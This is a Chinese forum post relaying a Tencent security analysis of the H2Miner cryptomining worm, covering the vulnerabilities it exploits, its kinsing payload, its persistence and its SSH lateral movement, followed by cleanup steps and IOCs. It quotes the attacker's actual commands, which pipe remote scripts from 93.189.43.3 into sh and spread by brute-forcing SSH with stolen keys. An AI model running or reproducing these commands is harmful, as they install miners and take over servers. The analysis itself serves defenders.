本帖最后由 腾讯电脑管家 于 2020-7-31 14:48 编辑
一、概述腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络,已被发现通过多个高危漏洞入侵Linux系统,并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心评估约有数千台服务器中招,腾讯安全专家建议相关企业尽快排查服务器被入侵的情况,及时清除H2Miner挖矿蠕虫病毒。 腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利,横向扫描扩大攻击面并维持与远程服务器(C2)通信,令服务器变成黑客控制的肉鸡。同时,具有卸载云服务器安全软件、删除云服务器镜像的能力,会给企业云服务器安全带来严重影响。 H2Miner挖矿蠕虫利用的高危漏洞包括: Redis未授权RCE; Solr dataimport RCE(CVE-2019-0193); Hadoop Yarn REST API未授权RCE(CVE-2017-15718); Docker Remote API未授权RCE; ThinkPHP5 RCE; Confluence 未授权RCE(CVE-2019-3396); SaltStack RCE(CVE-2020-11651) 等多个Web应用漏洞。 此次H2Miner变种更新了C2服务器地址,在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息,并利用搜索得到的userlist、hostlist、keylist、sshports进行组合尝试爆破登陆,从而扩大其攻击范围。 腾讯安全系列产品已针对H2Miner挖矿蠕虫病毒应急响应,建议相关企业参考如下清单加以排查:
二、样本分析Docker是一个开源的应用容器引擎,开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。Docker swarm 由docker官方提供,是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集群的管理和扩展。使用docker swarm的时候,管理的docker 节点上会开放一个TCP端口2375(或2376)。 攻击者利用未受保护的开放Docker API端口进行攻击,并执行恶意命令: wget -q -O – http[:]//93.189.43.3/d.sh | sh d.sh执行以下操作: 1. 禁用SELINUX并清除系统日志:echo SELINUX=disabled >/etc/selinux/config; 2. 卸载阿里云骑士和腾讯云镜; 3. 清除竞品挖矿木马; 4. 杀死正在运行的恶意Docker容器并删除它们的映像; 5. 下载恶意程序“kinsing”并运行; 6. 通过crontab定时任务每分钟下载和执行shell脚本; 7. 删除竞品挖矿木马的crontab定时任务。 下载得到的kinsing采用Golang编写,被编译为Linux平台可执行程序,主要有以下功能: 1.下载文件并执行; 2.启动和维持挖矿程序; 3.与C&C服务器通信,接收并执行远程命令; 3.利用masscan对外扫描; 4.针对redis服务进行爆破攻击; 5.下载shell脚本http[:]//93.189.43.3/spre.sh,以进行横向移动。 受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信,其中肉鸡的信息在http头部中标识。 Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi,然后启动连接矿池xmr-eu1.nanopool.org挖矿,配置中使用门罗币钱包为: 46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb
横向移动Spre.sh是用于在网络中横向传播H2Miner的shell脚本。为了发现攻击目标并找与其相对应的身份验证的信息,脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。 利用收集到的信息,恶意脚本尝试通过SSH连接到每个主机,使用每个可能的用户和密钥组合进行爆破登陆,以便在网络中的其他主机或容器上下载和运行shell脚本Spr.sh,spr.sh与最初攻击时的d.sh相同。 以下SSH命令用于在网络中传播H2Miner: ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"
三、手动清除H2Miner建议:1、 查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程,将其kill掉并删除对应的文件; 2、 查找crontab任务中包含“195.3.146.118”的相关项并删除。
IOCsIP 195.3.146.118 142.44.191.122 185.92.74.42 217.12.221.244 93.189.43.3 185.154.53.140 Md5
URL https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing https[:]//bitbucket.org/tromdiga1/git/raw/master/for http[:]//93.189.43.3/kinsing http[:]//93.189.43.3/kinsing2 http[:]//93.189.43.3/spr.sh http[:]//93.189.43.3/spre.sh http[:]//93.189.43.3/a.sh http[:]//93.189.43.3/cron.sh http[:]//93.189.43.3/d.sh http[:]//93.189.43.3/ex.sh http[:]//93.189.43.3/h2.sh http[:]//93.189.43.3/j.sh http[:]//93.189.43.3/lf.sh http[:]//93.189.43.3/p.sh http[:]//93.189.43.3/pa.sh http[:]//93.189.43.3/s.sh http[:]//93.189.43.3/t.sh http[:]//93.189.43.3/tf.sh http[:]//93.189.43.3/al.sh 参考链接: H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿,已获利370万元 | 
发表于 2020-7-31 14:37:14
